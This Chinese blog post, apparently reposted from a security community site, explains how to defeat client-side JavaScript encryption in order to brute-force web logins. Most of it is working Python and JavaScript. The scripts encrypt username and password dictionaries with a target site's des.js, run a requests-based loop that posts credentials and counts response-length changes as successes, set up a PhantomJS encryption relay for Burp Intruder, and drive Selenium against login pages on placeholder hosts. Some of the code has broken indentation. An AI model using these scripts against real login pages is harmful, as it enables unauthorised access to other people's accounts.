突破前端加密方法总结

2020-02-12 约 599 字 预计阅读 3 分钟

声明:本文 【突破前端加密方法总结】 由作者 LSA 于 2020-02-12 09:00:24 首发 先知社区 曾经 浏览数 262 次

感谢 LSA 的辛苦付出!

0x00 执行加密的js文件写脚本生成加密字典

https://yyy.xxx.com/assets/des/des.js

对密码(123456)进行了前端加密传输。

这里还需要从页面源代码找到加密方法的参数

pip install PyExecJS

再安装PhantomJS(可选),或者用默认的js解析引擎也行。(execjs.get().name)

加密脚本:生成加密后的用户名和密码

#coding:utf-8
#from selenium import webdriver
import execjs


def mzDes(s,para):
    despara = execjs.get('phantomjs').compile(s).call("strEnc",para,"csc","mz","2017")
    return despara

with open('des.js','r') as mzCrypto:

    s = mzCrypto.read()
    with open('users.txt','r') as users:   #des username
        with open('des_users.txt','w') as f4DesUser:
            user = users.readlines()
            for u in user:
                uname = u.strip()
                print uname
                desUsername = mzDes(s,uname)
                print desUsername
                f4DesUser.write(desUsername+'\n')



    with open('pwdTop54.txt','r') as pwds:   #des password
        with open('des_pwds.txt','w') as f4DesPwd:
            pwd = pwds.readlines()
            for p in pwd:
                passwd = p.strip()
                print passwd
                desPassword = mzDes(s,passwd)
                print desPassword
                f4DesPwd.write(desPassword+'\n')


这样就可以利用burpsuite/python脚本加载加密后的字典愉快的爆破啦。

py脚本爆破(单线程):

#coding:utf-8
#from selenium import webdriver
import execjs
import requests
import re




successCount = 0


def mzDes(s,para):
    despara = execjs.get().compile(s).call("strEnc",para,"csc","mz","2017")
    return despara

with open('des.js','r') as mzCrypto:

        s = mzCrypto.read()
        with open('users.txt','r') as users:   #des username


        user = users.readlines()
        for u in user:
            with open('top50.txt','r') as pwds:   #des password
                    uname = u.strip()
                    print uname
                    desUsername = mzDes(s,uname)
                    print desUsername

                    pwd = pwds.readlines()
                    for p in pwd:
                        passwd = p.strip()
                        print passwd
                        desPassword = mzDes(s,passwd)
                        print desPassword




                        burp0_url = "https://yyy.xxx.com:443/login"
                        burp0_cookies = {"acw_tc": "2", "session.id": "5e"}
                        burp0_headers = {"User-Agent": "Mozilla/5.0 Firefox", "Accept": "text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8", "Accept-Language": "en-US,en;q=0.5", "Content-Type": "application/x-www-form-urlencoded", "Origin": "https://yyy.xxx.com", "Connection": "close", "Referer": "https://yyy.xxx.com/login", "Upgrade-Insecure-Requests": "1"}
                        burp0_data = {"usernumber": "test", "username": desUsername, "password": desPassword, "geetest_challenge": "caaf52fec"}

                        rsp = requests.post(burp0_url, headers=burp0_headers, cookies=burp0_cookies, data=burp0_data)

                        #print rsp.headers['content-length']
                        #if rsp.headers['content-length'] != 23862:
                        #   print 'success!!!'
                        print len(rsp.content)
                        if len(rsp.content) != 23862:
                        print 'success'
                        successCount = successCount + 1
                        pattern = re.compile(r'<p class="login-error" id="errorTips">(.*?)</p>')

                        bruteResult = pattern.search(rsp.text)
                        print bruteResult

print successCount

如果遇到结合了动态因子(cookie或请求参数的某动态值)加密的,如key = substr(0,8,xsession),就要根据实际情况写爆破脚本了。

0x01 burpsuite插件jsencrypt

安装phantomjs

https://github.com/c0ny1/jsEncrypter

用法参考readme

编写对应的jsEncrypter_des.js

var webserver = require('webserver');
server = webserver.create();

var host = '127.0.0.1';
var port = '1664';

// 加载实现加密算法的js脚本
var wasSuccessful = phantom.injectJs('des.js');/*引入实现加密的js文件*/

// 处理函数
function js_encrypt(payload){
    var newpayload;
    /**********在这里编写调用加密函数进行加密的代码************/
    //var b = new Base64();
    newpayload = strEnc(payload,"key","para0","para1");
    /**********************************************************/
    return newpayload;
}

if(wasSuccessful){
    console.log("[*] load js successful");
    console.log("[!] ^_^");
    console.log("[*] jsEncrypterJS start!");
    console.log("[+] address: http://"+host+":"+port);
}else{
    console.log('[*] load js fail!');
}

var service = server.listen(host+':'+port,function(request, response){
    try{
        if(request.method == 'POST'){
            var payload = request.post['payload'];
            var encrypt_payload = js_encrypt(payload); 
            console.log('[+] ' + payload + ':' + encrypt_payload);
            response.statusCode = 200;
            response.write(encrypt_payload.toString());
            response.close();
        }else{
              response.statusCode = 200;
              response.write("^_^\n\rhello jsEncrypter!");
              response.close();
        }
    }catch(e){
        console.log('\n-----------------Error Info--------------------')
        var fullMessage = "Message: "+e.toString() + ':'+ e.line;
        for (var p in e) {
            fullMessage += "\n" + p.toUpperCase() + ": " + e[p];
        } 
        console.log(fullMessage);
        console.log('---------------------------------------------')
        console.log('[*] phantomJS exit!')
        phantom.exit();
    }   
});

0x02 理解js加密算法

如md5/sha1,直接写py脚本即可,复杂一点的就要调试js了

burpsuite的intruder模块自带了很多加密的选项可以直接用

0x03 浏览器自动化爆破

安装selenium
安装浏览器驱动,加入环境变量。

#coding:utf-8



import time
import sys
from selenium import webdriver

reload(sys) 
sys.setdefaultencoding('utf-8')



def BruteLogin(user,pwd):


        browser.get('http://xxx.cn/manage/login.aspx')
        browser.implicitly_wait(7)
        elem = browser.find_element_by_name("name")
        elem.send_keys(user)
        elem=browser.find_element_by_name("pws")
        elem.send_keys(pwd)

        elem=browser.find_element_by_id("submit")
        #print browser.current_window_handle
        elem.click()

        time.sleep(1)
        if '当前用户' in browser.page_source:

            print 'Login Success:' + user + '|' + pwd
            sys.exit()
        else:
            print 'LoginFaild!'


browser = webdriver.Chrome()


def main():

    with open('usernameTop500.txt','r') as fuser:
            for user in fuser.readlines():
                    u = user.strip()
                    with open('topwdglobal.txt','r') as fpwd:
                        for pwd in fpwd.readlines():
                                p = pwd.strip()
                                print 'testing...' + u,p
                                BruteLogin(u,p)

    browser.quit()



if __name__ == '__main__':
    main()

如果有些元素不能直接定位,就尝试用autochain,如:

#coding:utf-8
#Author:LSA
#Descript:selenium for brute
#Data:201812



import time
import sys
from selenium import webdriver
from selenium.webdriver.common import action_chains, keys
import time

reload(sys) 
sys.setdefaultencoding('utf-8')



def BruteLogin(user,pwd):


        browser.get('http://xxx.edu.cn/login.jsp')
        browser.implicitly_wait(20)

        action = action_chains.ActionChains(browser)

        elem = browser.find_element_by_name("j_username")
        elem.send_keys(user)

        action.perform()

        elem=browser.find_element_by_name("j_password")
        elem.send_keys(pwd)

        action.perform()

        elem=browser.find_element_by_name("btn_submit")
        #print browser.current_window_handle
        #elem.click()

        action.send_keys("document.getElementsByName('btn_submit')[0].click()"+keys.Keys.ENTER)
        action.perform()

        time.sleep(1)
        if '当前用户' in browser.page_source:

            print 'Login Success:' + user + '|' + pwd
            sys.exit()
        else:
            print 'LoginFaild!'


browser = webdriver.Chrome()


def main():

    with open('usernameTop500.txt','r') as fuser:
            for user in fuser.readlines():
                    u = user.strip()
                    with open('topwdglobal.txt','r') as fpwd:
                        for pwd in fpwd.readlines():
                            p = pwd.strip()
                            print 'testing...' + u,p
                            BruteLogin(u,p)

    browser.quit()



if __name__ == '__main__':
    main()

0x04 misc

  1. 中间服务器:自己搭一个服务及作为中继进行加密再发给目标服务器,较麻烦。
  2. 断点调试js修改参数
  3. fiddler替换js

可视具体情况使用。

//预览看到代码缩进没了,全部py脚本打包到附件了

关键词:[‘渗透测试’, ‘渗透测试’]


author

旭达网络

旭达网络技术博客,曾记录各种技术问题,一贴搞定.
本文采用知识共享署名 4.0 国际许可协议进行许可。

We notice you're using an adblocker. If you like our webite please keep us running by whitelisting this site in your ad blocker. We’re serving quality, related ads only. Thank you!

I've whitelisted your website.

Not now